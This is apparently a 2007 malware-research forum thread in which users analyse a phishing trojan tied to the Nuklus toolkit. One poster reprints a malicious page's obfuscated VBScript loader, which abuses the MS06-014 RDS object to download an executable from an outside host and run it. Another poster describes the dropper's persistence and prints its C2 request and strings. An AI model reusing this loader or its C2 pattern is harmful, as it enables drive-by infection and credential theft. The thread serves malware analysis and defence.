Skip navigation.
Home

Searching for: Trojan Crimeware using Google Maps

|

hi,

anyone catched the phishing trojan mentioned here?

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=741

upload would be great!

cheers,
frank

I haven't started looking

I haven't started looking for much detail yet but so far I have found the following info. Which may or may not be anything that you already know, The following link is a Symantec security response page:

http://www.symantec.com/enterprise/security_response/weblog/2007/02/nuklus_toolkit_in_action.html

There is a related (maybe) case, it gives the following info:
**quote**
The "iexplorer.exe" file downloads and installs five additional files from a server in Russia. The filenames are:

IEMod.dll
IEGrabber.dll
IEFaker.dll
CertGrabber.dll
PSGrabber.dll
**end quote**

The article can be found here:

http://www.symantec.com/enterprise/security_response/weblog/2007/02/nuklus_toolkit_in_action.html

But as it states in the article, "Both sets of URL's used MS06-014, both used the same lure, but they were different payloads that eventually were downloaded and installed." Although they both appear to use the Nuklus Toolkit.

I hope this is of some help to you.
Cheers, Lucent

here's some additional

here's some additional info.

surfing to http://bestfunny.hk/ gives me:

502 Service Temporarily Overloaded

Server congestion; too many connections; high traffic.

Keep trying until the page loads. This can be a common occurrence at peak news times.

Also try to shutdown your firewall and antivirus software.

and the html code:

502 Service Temporarily Overloaded

Dim Obj_Name
Dim Obj_Prog

set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

fn = "39177249250.exe"
Obj_Name = "S" & "h" & "e" & "l" & "l"
Obj_Prog = "A" & "p" & "pl" & "i" & "ca" & "ti" & "on"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn

Obj_Name = "Mi" & "cr" & "osoft"
Obj_Prog = "X" & "M" & "LHTT" & "P"
set obj_msxml2 = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
obj_msxml2.open "G" & "E" & "T","http://www.infohelp.hk/iexplore.exe",False
obj_msxml2.send

Obj_Name = "AD" & "ODB"
Obj_Prog = "St" & "rea" & "m"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
rem Obj_Name = "W" & "Sc" & "r" & "ipt"
rem Obj_Prog = "Sh" & "e" & "l" & "l"
rem set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
rem obj_WShell.Run fn,1,FALSE
obj_ShellApp.ShellExecute fn

502 Service Temporarily Overloaded

Server congestion;
too many connections; high traffic.

Keep trying until
the page loads. This can be a common occurrence at peak news times.

Also try to
shutdown your firewall and antivirus software.

unfortunately the url: http://www.infohelp.hk/iexplore.exe

is down. anyone catched: iexplore.exe ?

I grabbed a sample before it

I grabbed a sample before it went down...

53ce5510df571edafda6048d1d921a71 www.infohelp.hk/iexplore.exe

It's in the Malware archive here now; Search for that MD5.

I have the html/javascript pages that went it too, if needed.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

thanx for iexplore.exe. i

thanx for iexplore.exe.

i had some time this morning to look at it.

the binary was packed with WinUpack v0.39.

quite easy to unpack (esp trick).

the unpacked code then deobfuscates another binary with XOR 0x99 and drops it in the temp dir and starts it.

3fb.tmp.exe i 58.65.237.49 80 /~botnet2/apophis/script.php

the detached file is packed with WinUpack v.039 as well.

the unpacked binary copy itself to %systemroot%\system32\ as taskmang.exe and creates another file called mt_32.dll (not a real dll, just text ). the temp gets deleted then. taskmang.exe gets registered as service and tries to download the real trojan code from the ip mentioned above.

it seems that script.php validates the http request to ensure that only the dropper is able to leech the trojan code. here's the request:

POST /~botnet2/apophis/script.php?00000000 HTTP/1.1
Host: 58.65.237.49
Content-Type: multipart/form-data; boundary=--__abcd-xyz789__--
Content-Length: 185
Connection: Close

----__abcd-xyz789__--
Content-Disposition: form-data; name="conf"

Kernel:0;
----__abcd-xyz789__--
Content-Disposition: form-data; name="LastCommand"

----__abcd-xyz789__----

unfortunately, the code is no longer hosted on this box, so no further investigation was possible for me. :(

HTTP/1.1 404 Not Found
Date: Fri, 02 Mar 2007 14:57:30 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.5 mod_perl/1.
29 FrontPage/5.0.2.2510
Last-Modified: Sat, 27 Aug 2005 18:19:33 GMT
ETag: "918064-11c-4310aeb5"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: text/html

404 Not Found

Not Found
The requested URL was not found on this serve
r.

Apache Server at Port

anyone catched the following files?

FFGrabber
PSGrabber
CertGrabber
IEFaker
IEGrabber
IEMod

additionally here are the strings from the unpacked dropper:

kernel32.dll
LoadLibraryA
GetProcAddress
UpackByDwing@
.Upack
.rsrc
.mackt
VideoBiosDate
SystemBiosDate
HARDWARE\DESCRIPTION\System
Run
\cmd.exe
Kernel
FFGrabber
PSGrabber
CertGrabber
IEFaker
IEGrabber
IEMod
Delete
GetModInfo
Install
\shell\open\command
SOFTWARE\Clients\StartMenuInternet
POST %s?%08x HTTP/1.1
Host: %s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Connection: Close
%s%s
Content-Disposition: form-data; name="LastCommand"
--%s--
%s:%d:%d
--%s
Content-Disposition: form-data; name="conf"
%s:%d;
--__abcd-xyz789__--
ws2_32.dll
advapi32.dll
user23.dll
Type
Start
ErrorControl
ImagePath
ObjectName
LocalSystem
DisplayName
Windows Task Manager
SYSTEM\CurrentControlSet\Services\Taskmng
getaddrinfo
Connection: Close
HTTP/1.1
Host:
aaa /
.exe
Taskmng
SYSTEM\CurrentControlSet\Services
.dll
Stop
Activate
Execute
--%s--
Content-Type:
; filename="
--%s
Content-Disposition: form-data; name="%s"
POST %s HTTP/1.1
Host: %s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Connection: Close
%s?%08x
MTBase
\mt_32.dll
\taskmang.exe
WS2_32.DLL
NTDLL.DLL
NtUnmapViewOfSection
memcpy
ZwMapViewOfSection
NtCreateSection
memset
strlen
_chkstk
strtol
NtClose
SHLWAPI.DLL
SHDeleteKeyA
KERNEL32.DLL
SetEndOfFile
GetTempPathA
GetTempFileNameA
LoadLibraryExA
GetModuleFileNameA
GetCommandLineA
GetFileSize
VirtualFree
VirtualProtect
DuplicateHandle
GetModuleHandleA
ReadProcessMemory
VirtualAlloc
WaitForSingleObject
CloseHandle
lstrcmpiA
ReadFile
SetFilePointer
CreateFileA
WriteFile
GetEnvironmentVariableA
FreeLibrary
GetProcAddress
LoadLibraryA
SetErrorMode
lstrcatA
GetSystemDirectoryA
TerminateProcess
CreateRemoteThread
ExitProcess
GetLastError
DeleteFileA
Sleep
lstrlenA
CreateProcessA
lstrcpyA
CopyFileA
USER32.DLL
PeekMessageA
wsprintfA
DispatchMessageA
ADVAPI32.DLL
RegDeleteKeyA
RegCreateKeyExA
RegSetValueExA
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
advapi32.dll
RegDeleteKeyA
RegCreateKeyExA
RegSetValueExA
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
kernel32.dll
SetEndOfFile
GetTempPathA
GetTempFileNameA
LoadLibraryExA
GetModuleFileNameA
GetCommandLineA
GetFileSize
VirtualFree
VirtualProtect
DuplicateHandle
GetModuleHandleA
ReadProcessMemory
VirtualAlloc
WaitForSingleObject
CloseHandle
lstrcmpi
ReadFile
SetFilePointer
CreateFileA
WriteFile
GetEnvironmentVariableA
FreeLibrary
GetProcAddress
LoadLibraryA
SetErrorMode
lstrcat
GetSystemDirectoryA
TerminateProcess
CreateRemoteThread
ExitProcess
GetLastError
DeleteFileA
Sleep
lstrlen
CreateProcessA
lstrcpy
CopyFileA
shlwapi.dll
SHDeleteKeyA
user32.dll
PeekMessageA
wsprintfA
DispatchMessageA
ws2_32.dll
recv
connect
WSAStartup
socket
gethostbyname
htons
shutdown
send
closesocket
ntdll.dll
NtUnmapViewOfSection
memcpy
NtMapViewOfSection
NtCreateSection
memset
strlen
_alloca_probe
strtol
NtClose